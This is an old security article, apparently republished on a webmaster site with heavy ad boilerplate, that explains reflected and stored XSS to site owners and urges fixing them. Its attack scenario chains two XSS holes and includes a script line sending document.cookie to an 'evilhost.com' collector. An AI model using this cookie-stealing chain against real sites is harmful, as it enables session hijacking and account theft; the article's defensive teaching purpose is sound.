In this little paper I will try to convince admins, webmaster
and in general everyone is concerned to secure a web site of how
dangerous can be a XSS hole.
In this little paper I will try to convince admins, webmaster
and in general everyone is concerned to secure a web site of how
dangerous can be a XSS hole. I will not cover in depth what XSS
is because there's a huge library on this topic available on
internet and on http://www.hackerscenter.com/library
--[ 2.0 XSS So what's XSS? XSS stands for cross site scripting,
that is a way to inject script code into a web page making it
execute whenever the page loads or a specific event is triggered.
2.1 Temporary XSS
A factor because of which this kind of bug is understimated is
due to the "temporary xss" as I use to call them. Temporary xss
are script codes executed only when a script code within a
crafted input is issued by the user.
Example: http://vuln.host.com/search.asp?q=<![CDATA[</p>
<p>The above example will inject a "<plaintext>" tag in the
search.asp page showing the source html code of the page The
point here is: Who searched for <plaintext> will see the source
code but this not implies any permanent alteration of the page.</p>
<p> 2.2 Permanent XSS</p>
<p>A "permanent XSS" as I use to call them, are due to unsanitized
input by user that will be saved on a database for example. Each
time these unsanitized fields are read from the database and
printed on the page the script will be executed. (A lot of
registration forms server side scripts are affected by this kind
of vuln)</p>
<hr>
<p>--[ 3.0 Attacks</p>
<p>What I want to demonstrate in this article is how dangerous can
be a temporary xss. Most of the webmaster (99%, believe me),
treat this kind of bug as very very low level issue because of
the reasons we have seen. They think it is even a loss of time
to sanitize input that doesn't go into a database.</p>
<p>What they seem to be unable to understand is that whenever a
malicious user is able to run a client side script from their
domain name a cookie stealing attack can be *easily* taken. This
becomes a high level risk vuln when we deal with ecommerce site,
webmail service and similar.</p>
<p> 3.1 Scenario 1</p>
<p>Let's assume that we've found a xss vuln into 2 sites. The first
will be used as the "dumb" (A) site, that has a permanent xss
hole, while the latter will be a big shopping portal (B) I want
to steal cookie from, that has "just" a little innocent
temporary xss hole.</p>
<p>We mail the big shopping portal admin about the vuln, trying to
make him understand how serious it is the bug. He never reply.
So we decide to have some fun...innocent fun..as much innocent
as their xss hole was, I suppose...</p>
<p>What one could do is to inject a stealth script into the dumb
site to force (always stealthly) every visitor of site A to load
the vulnerable url we have found into site B. Here anyone can
understand that even
http://vuln.host.com/search.asp?q=<plaintext> is now very very
useful for our purpose. Instead of <plaintext>, we can use
something like this: http://vuln.host.com/search.asp?q=<script
src='http://myhosting.com/xsstrials/funny.js'></script></p>
<p>Funny.js will be our malicious script code that will be run on
vuln.host.com domain ...and it will be similar to this: //
Funny.js navigate to 'evilhost.com/collect_cookies.asp?cookie='
+ document.cookie // where collect_cookies.asp will be a server
side script that will collect everything passed by parameter
"cookie" and evilhost.com can be a hosting space set up by the
malicious attacker.</p>
<p>So what happens here? 1. A user visits dumb site thus triggering
our permanent xss. 2. The permanent xss will load the page
http://vuln.host.com/search.asp?q=<script
src='http://myhosting.com/xsstrials/funny.js'></script> that
executes funny.js thanks to the temporary xss hole in the big
shopping portal. 3. funny.js is now loaded on the big shopping
portal domain name letting us steal the cookie (and the login
data) of the dumb site visitor.</p>
<p> By "stealth script" we mean a script that doesn't change the
appearance of the page so that no one will notice any background
work.</p>
<p> -- [ Side effects</p>
<p>In this section I will show some side effects of the xss desease
that are often forgotten or misunderstood by a lot of
analysts/webmasters.</p>
<p>The xss holes, permanent and tempory ones, can be used to attack
a local victim (visitor of the vulnerable site) directly by
injecting a malicious code capable of exploting a local
vulnerability of the victim system. This has become very common
(and easy to do) because of the tons of vulnerabilities that
affect Internet Explorer and the browsers in general. </p>
<p>Let's take for example a xss hole into trustedsite.com. Anyone
could take advantage of the trustness of this domain to execute
code with high privilege levels, executing or installing
malicious activex. This kind of approach can be taken into
Internet Exlporer and in general in all the browsers that use
the so called trusted "Zones".</p>
<p>Another important issue that can make a simple XSS hole a high
level risk issue is the capability of attacking thousands
computers into few hours or even into minutes according to the
traffic of the vulnerable page. This kind of practice can lead
to malware/<a href="http://www.remove-virtumonde.com">adware</a> spread. If a high traffic page is vulnerable
to a permanent xss a malware/worm/adware coder can choose this
kind of approach to put the seeds of his worm making it spread
in a stealth manner and within few time.</p>
<p> -- [ How to solve the problem</p>
<p>Incredible to say, XSS holes are the most simple to solve and
fix. They usually involve script tag but not always. Less known
code can use the image tag with dynsrc or src parameters and
"javascript:alert('aaa')" as argument or the <style> tag e.g. :
<style type="text/javascript">script goes here</style></p>
<p> In general the characters to be sanitized are the usual "<" and
">" but there are some more to be carefully escaped: &{code};
will run the code into netscape / mozilla browsers so "&{"
combination of chars should be sanitized too. In the 99% of the
cases an "HTML Encode" would solve the problem. In asp it can be
easily done with the inbuilt function
server.htmlencode(myparameter).</p>
<p>About the author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
a leading security portal with texts and articles to help
securing web sites and networks.</p><div style="padding-top: 12px; padding-bottom: 12px;">Author: Zinho</div> <div style="clear:both;"></div>
<div class="cont_adbox"><div align="center">
<!-- Logo -->
<a href="/" title="The Domain Buffs Home"><img src="http://www.topsitescat.com/images/banners/domainbuffs_398x100.png" alt="The Domain Buffs Logo" width="398" height="100" border="0" style="padding:3px" /></a>
<!-- /Logo -->
<p> </p>
<!-- Domain Hostmaster Code: -->
<a href="http://www.DomainHostmaster.com" title="Domain Registration, Transfers, Hosting & Websites"><img src="http://www.domainhostmaster.com/images/banners/LOGO_Domain-Hostmaster_banner2_468x60.png" alt="Domain Hostmaster for Domains, Websites, Blogs & Hosting" width="468" height="60" border="0" style="padding:3px" /></a>
<!-- /Domain Hostmaster Code -->
<!-- Xara Web Designer (trial) 468x60 Banner: -->
<script src="http://site.xara.com/affiliate/code.asp?id=639994&prod=WebDesigner&type=flashbanner1"></script>
<!-- /Xara Web Designer (trial) 468x60 Banner -->
<p> </p>
<!-- Webmaster Related Information Resources: -->
<p align="center"><strong>Webmaster Related Information & Resource Sites:</strong><br />
<strong><a href="http://www.ParkingPPC.com" title="Create multiple income generating revenue streams online with domain name parking PPC ad publishing.">Parking PPC</a></strong>
<strong><a href="http://PPCAdIncome.com" title="PPC Ad Income: Monetize your Website or Blog.">PPC Ad Income: Website Monetization</a></strong>
<strong><a href="http://ApacheWebsiteHosting.com" title="Apache: HTTP Server, website hosting, dedicated servers, Server Side Includes and webmastering.">Apache Website Hosting</a></strong>
<strong><a href="http://DesignDirt.com" title="All the Dirt on Graphic Design">Design Dirt</a></strong>
<strong><a href="http://CSSWebsites.com" title="Design: CSS Websites">Design: CSS Websites</a></strong>
<strong><a href="http://DynamiteFlash.com" title="Dynamite Flash Design Techniques, Tips & Articles">Dynamite Flash</a></strong>
<strong><a href="http://OSWZ.com" title="Open Source Web Zine: An online magazine covering Open Source applications for webmasters.">Open Source Web Zine</a></strong>
<strong><a href="http://foosite.com" title="foo site: Website Coding. Web development, site application scripting & interactive online game programming.">foo site: Website Coding</a></strong>
<strong><a href="http://phpWebDevelopment.com/" title="php Web Development: Web application scripts, site programming & dynamic websites.">php Web Development</a></strong>
<strong><a href="http://Webmastery.US" title="American Webmastery articles, tips, tricks & info">American Webmastery</a></strong>
<strong><a href="http://MetaTagSEO.com" title="Meta Tag optimization techniques for better search engine ranking results.">Meta Tag SEO</a></strong>
<strong><a href="http://Pg1.US" title="Target: Page 1 Rankings in US Search Engines' Search Result Lists">Target: Page 1 Search Result Rankings</a></strong>
<strong><a href="http://www.AdWorking.com" title="Ad Working: A quick and simple guide to working new media advertising with advertising resources available.">Ad Working</a></strong>
<strong><a href="http://Yahooter.com" title="Are you a Yahooter? Learn all about Yahoo! Neat Yahoo stuff & tricks. Yahoo!: Mail, YIM, Groups, Personals, Business and Advertising. Anything Yahoo! Even covers Yahoo Search Marketing and Yahoo Slurp! Read up on the latest Yahoo search engine optimization techniques. Find out how to make Yahoo work for you.">Yahooter?</a></strong>
</p>
<!-- /Webmaster Related Information Resources -->
<p> </p>
<!-- Miscellaneous Websites of Interest: -->
<p align="center"><strong>Websites of Various Interests:</strong><br />
<strong><a href="http://USAutoTruck.com" title="US Auto & Truck resources">US Auto & Truck</a></strong>
<strong><a href="http://USAutoCzar.com" title="US Automotive News & Info">US Auto Czar</a></strong>
<strong><a href="http://HybridAutos.Info" title="Hybrid autos, electric fuel cell cars & alternative fuel vehicles">Hybrid Autos</a></strong>
<strong><a href="http://RaceFootage.com" title="Racing Video Footage Online">Race Footage</a></strong>
<strong><a href="http://HDTVWS.com" title="High Definition WideScreen Television Information & Resources">HDTV WideScreen</a></strong>
<strong><a href="http://HiDefDiscs.com" title="Blu-Ray high definition disc & video movies information.">Hi Def Discs</a></strong>
<strong><a href="http://High-Def.Info" title="High-Def format and devices information.">High-Def.Info</a></strong>
<strong><a href="http://XBOXPC.com" title="XBox & PC Entertainment Systems, Multimedia & Video Gaming">XBOX & PC</a></strong>
<strong><a href="http://XBOXMC.com" title="XBOX Mods, Multimedia & Entertainment Center">XBOX MC</a></strong>
<strong><a href="http://x-bx.com" title="XBox Video, Audio & New Media Entertainment Center & High-Def Gaming System">X-Bx: XBOX Entertainment System</a></strong>
<strong><a href="http://RFIDTek.com" title="RFID Technology articles, information & resources.">RFID Technology</a></strong>
<strong><a href="http://MomsCuisine.com" title="Mom's Cuisine: Food made with Love.">Mom's Cuisine</a></strong>
<strong><a href="http://Broil.Info" title="Healthy cooking: Broil.Info">Healthy Cooking: Broil.Info</a></strong>
<strong><a href="http://Nuptial.Biz" title="Nuptial Businesses: Companies and information to make her big day special. Wedding concentric businesses and articles.">Nuptial Businesses</a></strong>
<strong><a href="http://HonorableIntent.com" title="Relationship advise & marriage help info.">Honorable Intent</a></strong>
<strong><a href="http://Gunmanship.com" title="Gun safety, handing, care & marksmanship.">Gunmanship</a></strong>
<strong><a href="http://RingneckPheasantHunting.com" title="Ringneck Pheasant Hunting: Pheasant & Hunting Articles, Information, Guides & Outfitters."></a></strong>
<strong><a href="http://dogisamansbestfriend.com" title="Dog is a Man's Best Friend - Information on dogs, dog breeds, dog care & obedience training.">A Dog is a Man's Best Friend</a></strong>
<strong><a href="http://Scrimmaging.com" title="Team sports information & resources for: football, soccer, baseball, softball, basketball, volleyball, hockey & more..."></a></strong>
<strong><a href="http://MissionPlanet.com" title="Following NASA's news & information concerning our planetary missions to the moon and then on to Mars.">Mission: Planet</a></strong>
<strong><a href="http://Footrace.org" title="We are in a footrace against time to save the world.">Footrace.org</a></strong>
<!-- /Miscellaneous Websites of Interest -->
</div>
<p align="center">
<!-- Free Web Submission.com Code: -->
<a href="http://freewebsubmission.com">
<img src="http://freewebsubmission.com/images/fwsbutton11.gif" width="88" height="31" border="0" alt="Submit Your Site To The Web's Top 50 Search Engines for Free!"></a>
<!-- /Free Web Submission.com Code -->
<!-- Scrub The Web Meta Tag Analyzer -->
<a href="http://www.scrubtheweb.com/"><img src="http://www.scrubtheweb.com/abs/linkexchange/easy.gif"
alt="Search Engine Optimization SEO" width="88" height="31" /></a>
<!-- Scrub The Web Meta Tag Analyzer -->
<!-- Anoox ACL Code: -->
<a href="http://www.anoox.com/?sfi=nf0c0zep85byfrgq1as5"><img src="http://www.anoox.com/images/anoox-search-engine-2.gif" width="88" height="31" border="1"></a>
<!-- /Anoox ACL Code -->
<!-- ASR Search Engine Code: -->
<a href="http://www.activesearchresults.com/" title="Active Search Results - Search Engine"><img src="http://www.activesearchresults.com/images/asrbutton.png" alt="Active Search Results" width="88" height="31" border="0" /></a>
<!-- /ASR Search Engine Code -->
</p></div>
<div style="clear:both"></div>
</div>
<div class='sidebar span-8 last'>
<div class='sidebarboxtop'><img src="/templates/googlechrome/images/sidebartop.gif" alt="sidebartop" /></div>
<div class="sidebarbox">
<h3>Navigation</h3>
<ul>
<li><A href="resources.html">Resource Recommendations</A></li>
<li><A href="flash-design.html">Flash Design Resources</A></li>
</ul>
</div>
<div class='sidebarboxbottom'><img src="/templates/googlechrome/images/sidebarbottom.gif" alt="sidebarbottom" /></div>
<div class='sidebarboxtop'><img src="/templates/googlechrome/images/sidebartop.gif" alt="sidebartop" /></div>
<div class="sidebarbox">
<div class="adbox"><p> </p>
<div align="center">
<!-- Logo -->
<a href="/" title="The Domain Buffs Home"><img src="http://www.topsitescat.com/images/banners/domainbuffs_200x177.png" alt="The Domain Buffs Logo" width="200" height="177" border="0"></a>
<!-- /Logo -->
</div>
<p> </p>
<div align="center">
<!-- Top Sites Cat: -->
<a href="http://www.topsitescatalog.com/"><img src="http://www.topsitescatalog.com/button.php?u=DomainBuffs" alt="Top Sites Catâ„¢ - A Catalog of Top Sites by Rank" border="0" /></a>
<!-- /Top Sites Cat -->
<br />
<br />
<!--- Beginning of KEWLRANK.COM html --->
<a href="http://kewlrank.com/getrankinfo.php">
<img src="http://kewlrank.com/getrank.php?id=1280778328&type=15015" border="0"></a>
<!--- End of KEWLRANK.COM html --->
<br />
<br />
</div></div>
</div>
<div class='sidebarboxbottom'><img src="/templates/googlechrome/images/sidebarbottom.gif" alt="sidebarbottom" /></div>
<div class='sidebarboxtop'><img src="/templates/googlechrome/images/sidebartop.gif" alt="sidebartop" /></div>
<div class='sidebarbox'>
<h3>Archives</h3>
<ul>
<li><A href='http://domainbuffs.com/archive-2008-11.html'>November, 2008</A></li>
<li><A href='http://domainbuffs.com/archive-2008-12.html'>December, 2008</A></li>
<li><A href='http://domainbuffs.com/archive-2009-01.html'>January, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-02.html'>February, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-03.html'>March, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-04.html'>April, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-05.html'>May, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-06.html'>June, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-07.html'>July, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-08.html'>August, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-09.html'>September, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-10.html'>October, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-11.html'>November, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2009-12.html'>December, 2009</A></li>
<li><A href='http://domainbuffs.com/archive-2010-01.html'>January, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-02.html'>February, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-03.html'>March, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-04.html'>April, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-05.html'>May, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-06.html'>June, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-07.html'>July, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-08.html'>August, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-09.html'>September, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-10.html'>October, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-11.html'>November, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2010-12.html'>December, 2010</A></li>
<li><A href='http://domainbuffs.com/archive-2011-01.html'>January, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-02.html'>February, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-03.html'>March, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-04.html'>April, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-05.html'>May, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-06.html'>June, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-07.html'>July, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-08.html'>August, 2011</A></li>
<li><A href='http://domainbuffs.com/archive-2011-09.html'>September, 2011</A></li>
</ul>
</div>
<div class='sidebarboxbottom'><img src="/templates/googlechrome/images/sidebarbottom.gif" alt="sidebarbottom" /></div>
</div>
</div> <!-- container -->
<div class="footerpush"></div>
</div> <!--wrapper -->
<div class='footer'>
<div class="footercontent">
<A href="/privacy.html">Privacy Policy</A> | Domain Buffs: Premium Domain Speculation, Investing & Development is powered by <a href="http://wordpress.org/">WordPress</a>
</div>
</div>
</body>
</html>
]]></plaintext></p></div></div>
